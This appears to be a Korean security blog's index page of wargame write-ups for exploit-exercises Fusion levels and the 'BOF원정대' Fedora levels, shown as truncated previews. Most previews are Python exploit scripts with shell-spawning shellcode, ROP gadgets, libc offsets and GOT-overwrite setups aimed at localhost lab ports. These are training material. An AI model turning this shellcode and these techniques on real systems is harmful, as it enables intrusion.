
Computer Security/WarGame

[exploit-exercises] Fusion level 04 from socket import * import time import base64 from struct import * base_addr = 0xb782970d - 0x170d # get from stack smashing information libc_base = 0xb7698113 - 0xf3 - 0x19020 # get from stack smashing information read = base_addr + 0xd20 system = libc_base + 0x3cb20 pppr = base_addr + 0x19ba bss = base_addr + 0x4240 + 0x300 # password check """ lists = range(ord('0'),ord('9')+1) + range(ord('.. 더보기
[exploit-exercises] Fusion level 03 from socket import * from struct import * import hmac from hashlib import sha1 # contents: 0x804bdf4 # 0804: 0x8048584+7 # 8f: 804bda4+1 # 30: 80482a4 rand_plt = 0x08048f30 rand_got = 0x804bd98 memcpy = 0x8048e60 gContents = 0x804bdf4 ppppr = 0x804a26c pop_ebx = 0x8049402 # pop ebx ; pop ebp ;; pop_eax = 0x8049b4f # pop eax ; add esp 0x5c ;; add_eax_ebx = 0x80493f9 # add eax 0x804bde4 ; add [ebx.. 더보기
[exploit-exercises] Fusion level 02 from socket import * from struct import * import time def cipher(s,key): i=0 after="" while i 더보기
[exploit-exercises] Fusion level 01 from struct import * from socket import * import time fd=4 shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2 shellcode = shellcode.replace("\x41", chr(fd)) # bin/sh shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\ "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost',20001)) #raw_input(".. 더보기
[exploit-exercises] Fusion level 00 from struct import * from socket import * import time fd=4 shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2 shellcode = shellcode.replace("\x41", chr(fd)) # bin/sh shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\ "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost',20000)) print s.recv.. 더보기
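[exploit-exercises] ssh setting 처음에 putty로 ssh 접속을 못 해서 좀 헤맸는데, 우선 root 권한으로(또는 sudo) 접속한 후, # ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key # ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key 를 해줘야 putty로 접속 가능하다. (sshd 호스트 키가 생성되어 있지 않아 접속이 거부된 것으로 보인다. 참고로 최신 OpenSSH에서는 DSA 호스트 키가 기본적으로 비활성화되어 있어 RSA 키만으로 충분할 수 있다.) 더보기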
[BOF원정대/Fedora4] cruel -> enigma 0x080485e0 : mov 0x804985c,%eax 0x080485e5 : sub $0x4,%esp 0x080485e8 : push %eax 0x080485e9 : push $0x400 0x080485ee : lea 0xfffffc00(%ebp),%eax 0x080485f4 : push %eax 0x080485f5 : call 0x80483ec ... (gdb) x/x 0x804985c 0x804985c : 0x00236740 (gdb) x/10x 0x00236740 0x236740 : 0xfbad2098 0xb7fe1000 0xb7fe1000 0xb7fe1000 0x236750 : 0xb7fe1000 0xb7fe1000 0xb7fe1000 0xb7fe1000 0x236760 : 0xb7fe2000.. 더보기
[BOF원정대/Fedora4] dark_stone -> cruel /* The Lord of the BOF : The Fellowship of the BOF - cruel - Local BOF on Fedora Core 4 - hint : no more fake ebp, RET sleding on random library */ #include #include #include int main(int argc, char *argv[]) { char buffer[256]; if(argc & result $ xxd result | grep cve -A 4 ... 0000640: 6563 7665 2822 85c0 7553 65a1 5422 2c20 ecve("..uSe.T", 0000650: 5b30 5d2c 205b 2f2a 2030 2076 6172 7320 [0], [.. 더보기
[BOF원정대/Fedora3] evil_wizard -> dark_stone /* The Lord of the BOF : The Fellowship of the BOF - dark_stone - Remote BOF on Fedora Core 3 - hint : GOT overwriting again - port : TCP 8888 */ #include // magic potion for you void pop_pop_ret(void) { asm("pop %eax"); asm("pop %eax"); asm("ret"); } int main() { char buffer[256]; char saved_sfp[4]; int length; char temp[1024]; printf("dark_stone : how fresh meat you are!\n"); printf("you : ");.. 더보기
[BOF원정대/Fedora3] hell_fire -> evil_wizard /* The Lord of the BOF : The Fellowship of the BOF - evil_wizard - Local BOF on Fedora Core 3 - hint : GOT overwriting */ // magic potion for you void pop_pop_ret(void) { asm("pop %eax"); asm("pop %eax"); asm("ret"); } int main(int argc, char *argv[]) { char buffer[256]; char saved_sfp[4]; int length; if(argc 더보기